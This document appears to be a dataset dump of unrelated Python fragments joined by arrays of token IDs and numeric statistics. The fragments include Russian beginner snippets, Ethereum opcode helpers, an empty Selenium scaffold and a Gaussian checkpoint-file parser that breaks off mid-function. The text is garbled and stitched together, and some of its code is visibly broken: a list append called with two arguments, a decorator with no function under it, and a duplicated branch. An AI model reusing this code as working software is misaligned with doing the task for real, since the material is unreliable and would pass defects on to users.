from tencentcloud.cloudaudit.v20190319 import models
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
23,
532,
9,
12,
198,
2,
15069,
357,
66,
8,
2177,
12,
7908,
2320,
43,
317,
1959,
15302,
11,
257,
9368,
1087,
1664,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11... | 3.619835 | 242 |
# p = 2 * u + 1
# NOTE(review): `p`, `кг_муки_ученикам`, `напечатать_привет` and
# `цена_компа` are defined earlier in the file, outside this excerpt.
print("Прирожков", p(10))
# Same linear formula as `p` above, written as a lambda.
pq = lambda u: 2 * u + 1
# m = p / 20
######
print("Накормить класс:", кг_муки_ученикам(22), "кг муки")
напечатать_привет()
print("Тебе придётся раскошелиться на" , цена_компа("i7", 16, 128), "€")
| [
2,
279,
796,
362,
1635,
334,
1343,
352,
198,
198,
4798,
7203,
140,
253,
21169,
18849,
21169,
25443,
114,
31583,
25443,
110,
1600,
279,
7,
940,
4008,
198,
198,
79,
80,
796,
37456,
334,
25,
362,
1635,
334,
1343,
352,
198,
198,
2,
28... | 1.27551 | 196 |
import json
from collections import namedtuple
from eth_typing import Address
from eth.vm.opcode_values import *
# List of opcodes that call code from another contract.
ADDRESS_CALLING_OPCODES = [CALL, CALLCODE, STATICCALL, DELEGATECALL]
# List of opcodes that read addresses from the top of the stack.
ADDRESS_READING_OPCODES = [BALANCE, EXTCODESIZE, EXTCODECOPY, EXTCODEHASH, SELFDESTRUCT]
# List of opcodes that write addresses onto the top of the stack.
ADDRESS_CREATING_OPCODES = [CREATE, CREATE2]
# Debug modes (how a transaction is executed/inspected):
MODE_NONE = 0  # transaction is just sent and mined
MODE_DEBUG = 1  # user is able to step through the computation steps
MODE_DEBUG_AUTO = 2  # user sees the changes that happen, but stepping happens in a given time interval
class MyAddress:
    """
    Own data structure used to store addresses and other relevant
    information.  (Only the class shell is visible in this excerpt;
    attributes are presumably set elsewhere -- TODO confirm.)
    """
class MyContract(MyAddress):
    """
    Own Contract data structure which parses abi and bytecode as json
    and provides methods to access them.  NOTE(review): no such methods
    are defined in this excerpt -- verify against the full source.
    """
def get_stack_content(stack: list, n: int) -> list:
    """Return the top ``n`` stack elements as "0x"-prefixed hex strings.

    :param stack: The stack object as it is used by py-evm: a list of
        (type, value) pairs, e.g. ``[(int, 1), (bytes, b'\\x00')]`` is a
        stack with 2 elements.  The top of the stack is the end of the
        list.
    :param n: The number of elements to retrieve, counted from the top.
        If ``n`` exceeds the stack size, all elements are returned.
    :return: A list with the first ``n`` elements of the stack (top
        first), each converted to a string prepended with "0x".
    """
    # Slice with len(stack) - n instead of -n so that n == 0 yields [].
    top_items = stack[len(stack) - n:]
    result = []
    # Walk from the top of the stack (end of the list) downwards.
    for item_type, item_value in reversed(top_items):
        if item_type is int:
            # hex() already prepends "0x".
            result.append(hex(item_value))
        else:
            result.append("0x" + item_value.hex())
    return result
def hex2(n):
    """Convert an int to a "0x"-prefixed hex string of even digit count.

    Zeroes are padded so that the returned value has an even numbered
    length of hex digits.
    Examples: 1 -> "0x01", 100 -> "0x64", 255 -> "0xff", 256 -> "0x0100"

    :param n: The int value to convert.
    :return: Hex representation of n with "0x" prepended.
    """
    digits = format(n, 'x')
    if len(digits) % 2:
        digits = '0' + digits
    return '0x' + digits
| [
11748,
33918,
198,
6738,
17268,
1330,
3706,
83,
29291,
198,
6738,
4555,
62,
774,
13886,
1330,
17917,
198,
6738,
4555,
13,
14761,
13,
404,
8189,
62,
27160,
1330,
1635,
198,
198,
2,
1351,
286,
1034,
40148,
326,
869,
2438,
422,
1194,
277... | 2.765707 | 764 |
if __name__ == '__main__':
    # arr = [1, 4, 8, 3, 2]
    # print(search(arr))
    # Demo calls for `search`, defined earlier in the file (outside this
    # excerpt).  Both arrays first increase then decrease (bitonic) --
    # presumably a bitonic-array search for the value 3; TODO confirm.
    arr = [1, 2, 3, 5, 8, 3, 2]
    print(search(arr, 3))
    arr = [5, 10, 9, 7, 4, 3, 2]
    print(search(arr, 3))
| [
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1303,
5240,
796,
685,
16,
11,
604,
11,
807,
11,
513,
11,
362,
60,
198,
220,
220,
220,
1303,
3601,
7,
12947,
7,
3258,
4008,
628,
220,
22... | 1.862385 | 109 |
import traceback
from help_scripts import WebElementHandler
from help_scripts import BrowserWindowHandler
import time
from help_scripts import get_proxies
from help_scripts import selenium_operator as sop
# SEQUENCE OF DECISIONS TO MAKE IN ORDER OF 1 - 8
# SEQUENCE ORDER: 1
"""
BLANK
"""
# SEQUENCE ORDER: 2
# SEQUENCE ORDER: 3
# SEQUENCE ORDER: 4
# SEQUENCE ORDER: 5
# SEQUENCE ORDER: 6
# SEQUENCE ORDER: 7
# SEQUENCE ORDER: 8
| [
11748,
12854,
1891,
198,
198,
6738,
1037,
62,
46521,
1330,
5313,
20180,
25060,
198,
6738,
1037,
62,
46521,
1330,
34270,
27703,
25060,
198,
11748,
640,
198,
6738,
1037,
62,
46521,
1330,
651,
62,
1676,
87,
444,
198,
6738,
1037,
62,
46521,... | 3.013423 | 149 |
"""Low-level operations on Gaussian formatted checkpoint files.
Provides low-level interfaces to manipulate/extract data in Gaussian
formatted checkpoint files.
Attributes
----------
Methods
-------
get_data
Gets data from a FChk file for each quantity label.
get_hess_data
Gets or Builds Hessian data (eigenvectors and values).
Classes
-------
FChkIO
Main class to handle formatted checkpoint file operations.
Notes
-----
* While this module contains some basic error checks, it is intended to
be low-level, with no significant performance impacts. As a low-level
module, it should not be accessible to users but wrapped by developers
in charge of controlling that the queries are computationally AND
physically sound.
"""
import os # Used for file existence check
import re # Used to find keys in fchk file
from tempfile import TemporaryFile
from shutil import copyfileobj
import typing as tp
from math import ceil
from estampes import parser as ep
from estampes.base import ArgumentError, ParseDataError, ParseKeyError, \
QuantityError, TypeData, TypeDCrd, TypeDFChk, TypeDOrd, TypeQInfo, \
TypeQLvl, TypeQOpt, TypeQTag, TypeRSta
from estampes.data import property as edpr
# ================
# Module Constants
# ================
# Type aliases local to this module.
TypeQData = tp.Dict[str, tp.Optional[tp.Any]]  # parsed data, per label
TypeKword = tp.Dict[str, tp.Tuple[str, int, int]]  # key -> (dtype, nvals, file offset)
TypeQKwrd = tp.Union[str, tp.List[str]]  # one keyword or a list of keywords
NCOLS_FCHK = {  # Maximum number of columns per type in fchk
    'C': 5,  # Number of columns for character data per line
    'R': 5,  # Number of columns for float data per line
    'I': 6  # Number of columns for integer data per line
}
FCONV_FCHK = {  # Conversion function for each type
    'C': str,
    'I': int,
    'R': float
}
DFMT_FCHK = {  # Data format for each type
    'C': '{:12s}',
    'I': '{:12d}',
    'R': '{:16.8E}'
}
# ==============
# Module Classes
# ==============
class FChkIO(object):
"""Main class to handle formatted checkpoint file operations.
Main class to manage the parsing and formatting of data stored in
Gaussian formatted checkpoint file.
Attributes
----------
filename : str
Formatted checkpoint filename
version : str
Version, software-dependent
full_version : tuple
full version:
* Gaussian
* Gaussian major and minor revisions, mach and relesase date
Methods
-------
read_data(to_find, raise_error)
Extracts 1 or more data blocks from the fchk file
write_data(data, new_file, error_key, error_size)
Writes data corresponding to the keys to find.
show_keys()
Shows available keys in fchk if loaded
"""
@property
def filename(self) -> str:
"""Gets or sets the filename associated to the FChk object."""
return self.__fname
@filename.setter
@property
def version(self) -> tp.Dict[str, str]:
"""Returns the version of Gaussian used to generate the FChk.
Notes
-----
Earlier versions of Gaussian did not support this so this may be
empty.
"""
return self.__gversion
def show_keys(self):
"""Returns the available keys (only if loaded)."""
if self.__keys is None:
return None
else:
return sorted(self.__keys.keys())
@property
def full_version(self) -> tp.Tuple[str, tp.Any]:
"""Returns the full version, for the parser interface"""
return "Gaussian", self.__gversion
def read_data(self,
*to_find: tp.Tuple[str],
raise_error: bool = True) -> TypeQData:
"""Extracts data corresponding to the keys to find.
Parameters
----------
to_find
Key or list of keys to find.
raise_error
Only raises error if True, otherwise proceeds silently.
Raises
------
ParseKeyError
Key not found.
"""
keylist = [] # List of keywords to search
datlist = {} # type: TypeQData # List of data
# Fast Search
# -----------
# Uses the data in __keys to find pointers.
if self.__keys is not None:
# Build keyword list
# ^^^^^^^^^^^^^^^^^^
for item in to_find:
if not item.strip() in self.__keys:
if raise_error:
raise ParseKeyError(item)
else:
keylist.append([item, *self.__keys[item]])
# Sort the keys by order of appearance
keylist.sort(key=lambda x: x[3])
with open(self.filename, 'r') as fobj:
for item in keylist:
key, dtype, ndata, fpos = item
fobj.seek(fpos)
line = fobj.readline()
datlist[key] = self.__read_datablock(fobj, line, dtype,
ndata)
# Sequential Search
# -----------------
# Looks for keywords sequentially while reading file
else:
nkeys = len(to_find)
with open(self.filename, 'r') as fobj:
line = fobj.readline()
while line and nkeys > 0:
line = fobj.readline()
for key in to_find:
if line.startswith(key):
datlist[key] = self.__read_datablock(fobj, line)
nkeys -= 1
remaining = list(set(to_find) - set(datlist))
if len(remaining) > 0 and raise_error:
raise ParseKeyError(remaining[0])
return datlist
def write_data(self,
data: tp.Dict[str, tp.Sequence[tp.Any]],
new_file: tp.Optional[str] = None,
error_key: bool = True,
error_size: bool = True) -> None:
"""Writes data corresponding to the keys to find.
Reads a dictionary of keys and overwrites the data present in
the file.
If the key is not present or the size is inconsistent with the
data present in the file, an error is raised, except if
`error_key` or `error_size` are False, respectively.
Parameters
----------
data
Dictionary with the replacement data for each key.
new_file
Name of the file where data are printed.
If none, the internal file is overwritten.
error_key
If true, raises error if key not found.
error_size
If true, raises error for inconsistent size.
Raises
------
ParseKeyError
Key not found.
IndexError
Inconsistency in size between old and new data for a key.
"""
fmt_scal = {
'I': '{:<40s} I {:12d}\n',
'R': '{:<40s} R {:22.15E}\n',
'C': '{:<40s} C {:12s}\n',
}
fmt_head = '{:<40s} {:1s} N={:12d}\n'
# Compared available keys with those from new data set
# ----------------------------------------------------
keys_ok = {}
if self.__keys is not None:
# Uses the data in __keys to find pointers.
# Check if overlap between data and stored keys
keys = set(self.__keys) & set(data)
for key in keys:
keys_ok[self.__keys[key][-1]] = key
keys_no = list(set(data) - keys)
else:
nkeys = len(data)
keys_no = data.keys()
with open(self.filename, 'r') as fobj:
line = fobj.readline()
while line and nkeys > 0:
fpos = 0
if line[0] != ' ':
for index, key in enumerate(keys_no):
if line.startswith(key):
keys_ok[fpos] = keys_no.pop(index)
nkeys -= 1
fpos += len(line)
line = fobj.readline()
if keys_no and error_key:
raise ParseKeyError(', '.join(keys_no))
# Now set where data are to be saved
if new_file is None:
fdest = TemporaryFile()
else:
fdest = open(new_file, 'w')
# Now let us copy the content of the internal file in destination
# For each key retained after the analysis, we replace with the new
# data
with open(self.filename, 'r') as fsrc:
fpos = 0
for line in fsrc:
if fpos in keys_ok:
key = keys_ok[fpos]
dtype, ndat_ref, ncols, nlin_ref = self.__info_block(line)
ndat_new = len(data[key])
if ndat_ref == 0:
if ndat_new > 1 and error_size:
raise IndexError(f'Inconsistency with {key}')
else:
fdest.write(fmt_scal[dtype].format(key, data[key]))
else:
fdest.write(fmt_head.format(key, ndat_new))
for i in range(0, ndat_new, ncols):
N = min(ncols, ndat_new-i)
fmt = N*DFMT_FCHK[dtype] + '\n'
fdest.write(fmt.format(data[key][i:i+N]))
for _ in range(nlin_ref):
line = next(fsrc)
fpos += len(line)
else:
fdest.write(line)
fpos += len(line)
# Copy back file if requested
if new_file is not None:
fdest.seek(0)
fsrc.seek(0)
copyfileobj(fdest, fsrc)
def __store_keys(self) -> TypeKword:
"""Stores the keys in the fchk to speed up search.
Loads the keys present in the file and pointers to their
position to speed up their search.
Data type and block information are also stored.
Returns
-------
dict
For each key, returns a tuple with:
1. data type (I, R, C)
2. Number of values (0 for scalar)
3. position in files
"""
to_search = re.compile(r'''
(?P<title>[\w\s/\-]+?)\s* # Key
\b(?P<type>[IRC])\b\s* # Data type
(?P<block>N=)?\s+ # N= only set for non-scalar data
(?P<value>[\d\-\+\.E]+) # Block size (N=) or scalar value
$''', re.VERBOSE)
keys = {}
with open(self.filename, 'r') as fobj:
fpos = 0
for line in fobj:
res = to_search.match(line)
if res:
nval = int(res.group(3) and res.group(4) or 0)
keys[res.group(1)] = (res.group(2), nval, fpos)
fpos += len(line)
return keys
def __info_block(self, line: tp.Optional[str] = None,
datatype: tp.Optional[str] = None,
numdata: tp.Optional[int] = None
) -> tp.List[tp.Any]:
"""Extracts information on a given block.
Extracts information on a block, either from the line or data
in arguments.
Parameters
----------
line
Starting line of a block.
datatype
Type of data.
numdata
Number of data.
Returns
-------
str
Type of data.
int
Number of data.
int
Number of columns.
int
Number of lines.
Raises
------
ArgumentError
Arguments are insufficient to generate the data.
ParseDataError
Unsupported data types.
"""
if datatype is None and line is None:
raise ArgumentError('line and datatype cannot be both absent')
# If data type unknown, line has not been parsed
if datatype is None:
cols = line.split()
if 'N=' in line:
dtype = cols[-3]
ndata = int(cols[-1])
else:
dtype = cols[-2]
ndata = 0
else:
dtype = datatype
ndata = numdata
# Sets parameters:
try:
ncols = NCOLS_FCHK[dtype]
except KeyError:
raise ParseDataError(dtype, 'Unsupported data type')
nlines = int(ceil(ndata/ncols))
return dtype, ndata, ncols, nlines
def __read_datablock(self, fobj: tp.TextIO,
line: str,
datatype: tp.Optional[str] = None,
numdata: tp.Optional[int] = None
) -> tp.List[tp.Any]:
"""Reads a data block in the formatted checkpoint file.
Reads a data block from a Gaussian formatted checkpoint file.
The file "cursor" should be at the "title/section line" and the
content stored in 'line'.
Parameters
----------
fobj
Opened file.
line
Current line read from file object.
datatype
Type of the scalar or data block.
numdata
Size of the data block (0 if scalar).
Raises
------
ParseDataError
Unsupported data type.
Notes
-----
* The function uses readline() to extract the actual block.
* The parsing is mostly format-free for simplicity.
.. [1] http://gaussian.com/interfacing/?tabid=3
"""
dtype, _, _, nlines = self.__info_block(line, datatype, numdata)
# Sets parameters:
try:
fconv = FCONV_FCHK[dtype]
except KeyError:
raise ParseDataError(dtype, 'Unsupported data type')
# Data Extraction
# ---------------
if nlines == 0:
# Scalar
data = [fconv(line.split()[-1])]
else:
# Data Block
# We use a slightly different scheme for C since Gaussian cuts
# arbitrarily strings in the middle in the format
if dtype == 'C':
block = ''
for _ in range(nlines):
block += fobj.readline().rstrip('\n') # Remove newline
data = block.split()
else:
data = []
for _ in range(nlines):
line = fobj.readline()
data.extend([fconv(item) for item in line.split()])
return data
# ================
# Module Functions
# ================
def qlab_to_kword(qtag: TypeQTag,
qopt: TypeQOpt = None,
dord: TypeDOrd = None,
dcrd: TypeDCrd = None,
rsta: TypeRSta = None,
qlvl: TypeQLvl = None) -> TypeQKwrd:
"""Returns the keyword(s) relevant for a given quantity.
Returns the keyword corresponding to the block containing the
quantity of interest and the list all keywords of interest for
possible conversions.
Parameters
----------
qtag
Quantity identifier or label.
qopt
Quantity-specific options.
dord
Derivative order.
dcrd
Reference coordinates for the derivatives.
rsta
Reference state or transition:
- scalar: reference state
- tuple: transition
qlvl
Level of theory use to generate the quantity.
Returns
-------
list
List of keywords for the data to extract.
list
Information needed for extracting the quantity of interest.
1. keyword in the formatted checkpoint file
2. position of the first element in the data block
3. offsets for "sub-block" storage (data in several blocks)
Raises
------
NotImplementedError
Missing features.
QuantityError
Unsupported quantity.
ValueError
Unsupported case.
Notes
-----
- `n` refers to all available states.
"""
keywords = []
keyword = None
if qtag == 'natoms':
keyword = 'Number of atoms'
elif qtag == 'nvib':
keyword = 'Number of Normal Modes'
elif qtag == 'atmas':
keyword = 'Real atomic weights'
elif qtag == 'atnum':
keyword = 'Atomic numbers'
elif qtag == 'molsym':
raise NotImplementedError()
elif qtag == 'atcrd' or qtag == 2:
keyword = 'Current cartesian coordinates'
elif qtag in ('hessvec', 'hessval'):
if qtag == 'hessvec':
keyword = 'Vib-Modes'
else:
keyword = 'Vib-E2'
elif qtag == 'swopt':
keyword = 'Route'
elif qtag == 'swver':
keyword = 'Gaussian Version'
elif qtag == 'fcdat':
raise NotImplementedError()
elif qtag == 'vptdat':
raise NotImplementedError()
elif qtag in ('dipstr', 'rotstr'):
keywords = ['ETran scalars']
if isinstance(rsta, int) or rsta == 'c':
if qopt == 'H':
keyword = 'Vib-E2'
keywords.append('Number of Normal Modes')
else:
keyword = 'Anharmonic Vib-E2'
keywords.append('Anharmonic Number of Normal Modes')
else:
keyword = 'ETran state values'
else:
if isinstance(rsta, tuple):
keyword = 'ETran state values'
if qtag == 1 and dord == 0:
keywords = ['ETran scalars', 'SCF Energy']
else:
if qtag == 1:
if dord == 0:
if rsta == 'c':
keyword = 'Total Energy'
del keywords[:]
elif type(rsta) is int:
if rsta == 0:
keyword = 'SCF Energy'
else:
keyword = 'ETran state values'
keywords.append('Total Energy', 'ETran scalars')
elif dord == 1:
if dcrd is None or dcrd == 'X':
if rsta == 'c' or type(rsta) is int:
keyword = 'Cartesian Gradient'
elif dord == 2:
if dcrd is None or dcrd == 'X':
if rsta == 'c' or type(rsta) is int:
keyword = 'Cartesian Force Constants'
elif qtag == 50:
raise NotImplementedError()
elif qtag == 91:
raise NotImplementedError()
elif qtag == 92:
keyword = 'RotTr to input orientation'
elif qtag == 93:
keyword = 'RotTr to input orientation'
elif qtag == 101:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Dipole Moment'
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'Dipole Derivatives'
elif qtag == 102:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise ParseDataError('Magnetic dipole not available')
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'AAT'
elif qtag == 103:
raise NotImplementedError()
elif qtag == 104:
raise NotImplementedError()
elif qtag == 105:
raise NotImplementedError()
elif qtag == 106:
raise NotImplementedError()
elif qtag == 107:
raise NotImplementedError()
elif qtag == 201:
raise NotImplementedError()
elif qtag == 202:
raise NotImplementedError()
elif qtag == 203:
raise NotImplementedError()
elif qtag == 204:
raise NotImplementedError()
elif qtag == 205:
raise NotImplementedError()
elif qtag == 206:
raise NotImplementedError()
elif qtag == 207:
raise NotImplementedError()
elif qtag == 208:
raise NotImplementedError()
elif qtag == 209:
raise NotImplementedError()
elif qtag == 300:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Frequencies for FD properties'
else:
msg = 'Incident frequencies not available'
raise ParseDataError(msg)
else:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Frequencies for DFD properties'
else:
msg = 'Incident frequencies not available'
raise ParseDataError(msg)
elif qtag == 301:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Alpha(-w,w)'
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative Alpha(-w,w)'
elif qtag == 302:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'FD Optical Rotation Tensor'
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative FD Optical Rotation Tensor'
elif qtag == 303:
if type(rsta) is int or rsta == 'c':
raise ParseDataError('Alpha(w,0) not available')
elif qtag == 304:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'D-Q polarizability'
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative D-Q polarizability'
elif qtag == 305:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif qtag == 306:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
else:
raise QuantityError('Unknown quantity')
keywords.insert(0, keyword)
return keyword, keywords
def _parse_electrans_data(qtag: TypeQTag,
dblocks: TypeDFChk,
kword: str,
qopt: TypeQOpt = None,
dord: TypeDOrd = None,
dcrd: TypeDCrd = None,
rsta: TypeRSta = None
) -> TypeQData:
"""Sub-function to parse electronic-transition related data.
Parses and returns data for a given quantity related to an
electronic transition.
Parameters
----------
qtag
Quantity identifier or label.
dblocks
Data blocks, by keyword.
kword
Keyword for quantity of interest.
qopt
Quantity-specific options.
dord
Derivative order.
dcrd
Reference coordinates for the derivatives.
rsta
Reference state or transition:
- scalar: reference state
- tuple: transition
Returns
-------
dict
Data for each quantity.
Raises
------
ParseKeyError
Missing required quantity in data block.
IndexError
State definition inconsistent with available data.
QuantityError
Unsupported quantity.
"""
# ETran Scalar Definition
# -----------------------
# Check that ETran scalars are present and parse relevant values
key = 'ETran scalars'
if key in dblocks:
# Structure of ETran scalars
# 1. Number of electronic states
# 2. Number of scalar data stored per state
# 3. 1 of R==L transition matrix, 2 otherwise
# 4. Number of header words (irrelevant in fchk)
# 5. State of interest
# 6. Number of deriv. (3*natoms + 3: electric field derivatives)
(nstates, ndata, _, _, iroot,
_) = [item for item in dblocks[key][:6]]
else:
raise ParseKeyError('Missing scalars definition')
# States Information
# ------------------
initial, final = rsta
if initial != 0:
if final != 0:
raise IndexError('Unsupported transition')
else:
initial, final = final, initial
# Quantity-specific Treatment
# ---------------------------
if qtag == 2:
key = 'SCF Energy'
if key not in dblocks:
raise ParseKeyError('Missing ground-state energy')
energy0 = dblocks[key]
if final == 'a':
data = [dblocks[key][i*ndata]-energy0 for i in range(nstates)]
else:
fstate = final == 'c' and iroot or final
if fstate > nstates:
raise IndexError('Missing electronic state')
data = float(dblocks[key][(fstate-1)*ndata]) - energy0
elif qtag in (101, 102, 103):
lqty = edpr.property_data(qtag).dim
if qtag == 101:
if qopt == 'len':
offset = 1
else:
offset = 4
elif qtag == 102:
offset = 7
else:
offset = 10
if dord == 0:
if final == 'a':
data = [dblocks[kword][i*ndata+offset:i*ndata+offset+lqty]
for i in range(nstates)]
else:
fstate = final == 'c' and iroot or final
if fstate > nstates:
raise IndexError('Missing electronic state')
i0 = (fstate-1)*ndata + offset
data = dblocks[kword][i0:i0+lqty]
else:
raise QuantityError('Unsupported quantity')
return data
def _parse_freqdep_data(qtag: TypeQTag,
                        dblocks: TypeDFChk,
                        kword: str,
                        qopt: TypeQOpt = None,
                        dord: TypeDOrd = None,
                        dcrd: TypeDCrd = None,
                        rsta: TypeRSta = None
                        ) -> TypeQData:
    """Sub-function to parse data on frequency-dependent properties.

    Parses and returns data on a specific property for one or more
    incident frequencies.

    Parameters
    ----------
    qtag
        Quantity identifier or label.
    dblocks
        Data blocks, by keyword.
    kword
        Keyword for quantity of interest.
    qopt
        Quantity-specific options (here: 1-based incident-frequency
        index, or None/0 for all frequencies).
    dord
        Derivative order (0 or 1).
    dcrd
        Reference coordinates for the derivatives (unused here).
    rsta
        Reference state or transition (unused here):
        - scalar: reference state
        - tuple: transition

    Returns
    -------
    dict
        Data for each quantity.

    Raises
    ------
    ParseKeyError
        Missing required quantity in data block.
    IndexError
        Error with definition of incident frequency.
    QuantityError
        Unsupported quantity.
    """
    # Check Incident Frequency
    # ------------------------
    # Normalize qopt to an int: 0 means "all incident frequencies".
    if qopt is None:
        qopt_ = 0
    elif not isinstance(qopt, int):
        raise IndexError()
    else:
        qopt_ = qopt
    # Quantity-specific Treatment
    # ---------------------------
    # Check size of derivatives is requested
    if dord == 0:
        nder = 1
    elif dord == 1:
        key = 'Number of atoms'
        if key not in dblocks:
            raise ParseKeyError('Missing number of atoms')
        # NOTE(review): FChkIO.read_data returns a list even for scalar
        # keys, so `3*natoms` would repeat a list here; presumably an
        # int is expected -- confirm how dblocks is populated upstream.
        natoms = dblocks[key]
        nder = 3*natoms
    else:
        raise IndexError('Unsupported derivative order')
    # Per-frequency block length: 3x3 tensors (301-303) or 3x6 (304-306),
    # times the number of derivative components.
    if qtag == 301:
        lqty = 9*nder
    elif qtag == 302:
        lqty = 9*nder
    elif qtag == 303:
        lqty = 9*nder
    elif qtag == 304:
        lqty = 18*nder
    elif qtag == 305:
        lqty = 18*nder
    elif qtag == 306:
        lqty = 18*nder
    else:
        raise QuantityError('Unsupported quantity')
    lblock = len(dblocks[kword])
    ndata = lblock // lqty  # Assumed block is correctly built
    if qopt_ == 0:
        # All incident frequencies: list of per-frequency blocks.
        data = [dblocks[kword][i*lqty:(i+1)*lqty] for i in range(ndata)]
    else:
        # Single incident frequency, 1-based index.
        if qopt_ > ndata:
            raise IndexError('Incident frequency index out of range')
        data = dblocks[kword][(qopt_-1)*lqty:qopt_*lqty]
    return data
def parse_data(qdict: TypeQInfo,
qlab2kword: tp.Dict[str, str],
datablocks: TypeDFChk,
gver: tp.Optional[tp.Tuple[str, str]] = None,
raise_error: bool = True) -> TypeData:
"""Parses data arrays to extract specific quantity.
Parses data array to extract relevant information for each quantity.
Parameters
----------
qdict
Dictionary of quantities.
qlab2kword
mMin keyword for each quantity.
datablocks
Data blocks, by keyword.
gver
Gaussian version (major, minor).
raise_error
If True, error is raised if the quantity is not found.
Returns
-------
dict
Data for each quantity.
Raises
------
ParseKeyError
Missing required quantity in data block.
IndexError
State definition inconsistent with available data.
ValueError
Data inconsistency with respect to shape.
QuantityError
Unsupported quantity.
"""
data = {}
for qlabel in qdict:
qtag, qopt, dord, dcrd, rsta, qlvl = qdict[qlabel]
kword = qlab2kword[qlabel]
# Basic Check: main property present
# -----------
if kword not in datablocks and not empty_cases_ok(qtag, qopt):
if raise_error:
raise ParseKeyError('Missing quantity in file')
else:
data[qlabel] = None
continue
data[qlabel] = {}
# Basic Properties/Quantities
# ---------------------------
if qtag == 'natoms':
data[qlabel]['data'] = int(datablocks[kword])
elif qtag in ('atcrd', 2):
data[qlabel]['data'] = ep.reshape_dblock(datablocks[kword], (3, ))
elif qtag in ('atmas', 'atnum'):
data[qlabel]['data'] = datablocks[kword]
elif qtag == 'swopt':
data[qlabel]['data'] = ' '.join(datablocks[kword])
elif qtag == 'molsym':
raise NotImplementedError()
elif qtag == 'swver':
pattern = re.compile(r'(\w+)-(\w{3})Rev([\w.+]+)')
res = re.match(pattern, ''.join(datablocks[kword])).groups()
data[qlabel] = {'major': res[1], 'minor': res[2],
'system': res[0], 'release': None}
# Vibrational Information
# -----------------------
# Technically state should be checked but considered irrelevant.
elif qtag == 'nvib':
if kword in datablocks:
data[qlabel]['data'] = int(datablocks[kword])
else:
# For a robust def of nvib, we need the symmetry and
# the number of frozen atoms. For now, difficult to do.
raise NotImplementedError()
elif qtag in ('hessvec', 'hessval'):
if kword in datablocks:
data[qlabel]['data'] = datablocks[kword]
# Vibronic Information
# --------------------
elif qtag == 'fcdat':
raise NotImplementedError()
# Anharmonic Information
# ----------------------
elif qtag == 'vptdat':
raise NotImplementedError()
# State(s)-dependent quantities
# -----------------------------
else:
# Transition moments
# ^^^^^^^^^^^^^^^^^^
if type(rsta) is tuple:
data[qlabel]['data'] = _parse_electrans_data(qtag, datablocks,
kword, qopt, dord,
dcrd, rsta)
# States-specific Quantities
# ^^^^^^^^^^^^^^^^^^^^^^^^^^
else:
key = 'ETran scalars'
if key in datablocks:
(nstates, ndata, _, _, iroot,
_) = [item for item in datablocks[key][:6]]
curr_sta = rsta == 'c' or rsta == iroot
# Only energy is currently computed for all states:
if rsta == 'a' and qtag == 2:
data = [float(datablocks[kword][i*ndata])
for i in range(nstates)]
# Data for current electronic states
elif curr_sta:
if qtag in ('dipstr', 'rotstr'):
if qlvl == 'H':
key = 'Number of Normal Modes'
else:
key = 'Anharmonic Number of Normal Modes'
if key not in datablocks:
raise ParseKeyError('Missing necessary dimension')
ndat = int(datablocks[key])
if qtag == 'dipstr':
offset = 7*ndat
else:
offset = 8*ndat
data[qlabel]['data'] = \
datablocks[kword][offset:offset+ndat]
elif qtag == 1:
data[qlabel]['data'] = datablocks[kword]
elif qtag == 92:
data[qlabel]['data'] = datablocks[kword][:9]
elif qtag == 93:
data[qlabel]['data'] = datablocks[kword][9:]
elif qtag in (50, 91):
raise NotImplementedError()
elif qtag == 101:
if dord in (0, 1):
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 102:
if dord == 1:
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 300:
if dord in (0, 1):
if qopt == 0:
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 300:
if dord in (0, 1):
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
else:
raise NotImplementedError()
return data
def get_data(dfobj: FChkIO,
             *qlabels: str,
             error_noqty: bool = True) -> TypeData:
    """Gets data from a FChk file for each quantity label.

    Reads one or more full quantity labels from `qlabels` and returns
    the corresponding data.

    Parameters
    ----------
    dfobj
        Formatted checkpoint file as `FChkIO` object.
    *qlabels
        List of full quantity labels to parse.
    error_noqty
        If True, error is raised if the quantity is not found.

    Returns
    -------
    dict
        Data for each quantity (None if no label was given).

    Raises
    ------
    TypeError
        Wrong type of data file object.
    ParseKeyError
        Missing required quantity in data block.
    IndexError
        State definition inconsistent with available data.
    QuantityError
        Unsupported quantity.
    """
    # First, check that the file is a correct instance
    if not isinstance(dfobj, FChkIO):
        raise TypeError('FChkIO instance expected')
    # Check if anything to do
    # NOTE(review): returns None here although the annotation promises
    # TypeData -- callers must handle the empty case.
    if len(qlabels) == 0:
        return None
    # Build Keyword List
    # ------------------
    # List of keywords
    full_kwlist = []
    main_kwlist = {}
    qty_dict = {}
    for qlabel in qlabels:
        # Label parsing
        # ^^^^^^^^^^^^^
        qty_dict[qlabel] = ep.parse_qlabel(qlabel)
        keyword, keywords = qlab_to_kword(*qty_dict[qlabel])
        if keyword is not None:
            full_kwlist.extend(keywords)
            main_kwlist[qlabel] = keyword
    # Check if list in the end is not empty
    if not main_kwlist:
        raise QuantityError('Unsupported quantities')
    # Data Extraction
    # ---------------
